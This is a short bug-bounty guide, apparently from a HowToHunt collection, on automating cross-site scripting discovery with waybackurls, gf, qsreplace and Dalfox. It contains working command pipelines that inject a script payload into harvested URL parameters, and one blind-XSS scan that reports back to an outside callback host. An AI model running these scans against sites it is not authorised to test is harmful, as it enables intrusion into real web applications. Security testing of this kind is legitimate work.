Automated XSS
Prerequisites: Installing Go on Your Machine
Before proceeding, ensure that Go is installed on your system. You can install it using the following commands:
sudo apt install -y golang
export GOROOT=/usr/lib/go
export GOPATH=$HOME/go
export PATH=$GOPATH/bin:$GOROOT/bin:$PATH
source .bashrc
Hunting Blind XSS Using Dalfox
To detect blind XSS vulnerabilities, follow these steps:
Use WaybackURLs to extract URLs for the target.
Use GF patterns to identify possible XSS-vulnerable parameters.
Utilize Dalfox to detect XSS.
Execution Command:
waybackurls testphp.vulnweb.com | gf xss | sed 's/=.*/=/' | sort -u | tee Possible_xss.txt && \
cat Possible_xss.txt | dalfox -b blindxss.xss.ht pipe > output.txt
Hunting Reflected XSS
To identify reflected XSS vulnerabilities, follow these steps:
Extract URLs using WaybackURLs.
Use qsreplace to inject payloads and analyze responses.
Execution Command:
waybackurls testphp.vulnweb.com | grep '=' | qsreplace '"><script>alert(1)</script>' | \
while read host; do
curl -s --path-as-is --insecure "$host" | grep -qs "<script>alert(1)</script>" && \
echo "$host \033[0;31m Vulnerable"
done
Identifying Parameters That Do Not Filter Special Characters
The following command checks whether parameters accept special characters without proper sanitization:
echo "test.url" | waybackurls | grep "=" | tee waybackurls.txt
cat waybackurls.txt | egrep -iv ".(jpg|jpeg|js|css|gif|tif|tiff|png|woff|woff2|ico|pdf|svg|txt)" | \
qsreplace '"><()' | tee combinedfuzz.json && \
cat combinedfuzz.json | while read host; do
curl --silent --path-as-is --insecure "$host" | grep -qs "\"><()" && \
echo -e "$host \033[91m Vulnerable \e[0m \n" || \
echo -e "$host \033[92m Not Vulnerable \e[0m \n"
done | tee XSS.txt
Downloading the Required Tools
The following tools are required for this process:
Dalfox
WaybackURLs
GF
GF Patterns
qsreplace
A complete script can be found here: QuickXSS
Contact Information
For any questions or further discussions, feel free to reach out on Twitter:
Enhanced and reformatted for HowToHunt repository by remonsec
Last updated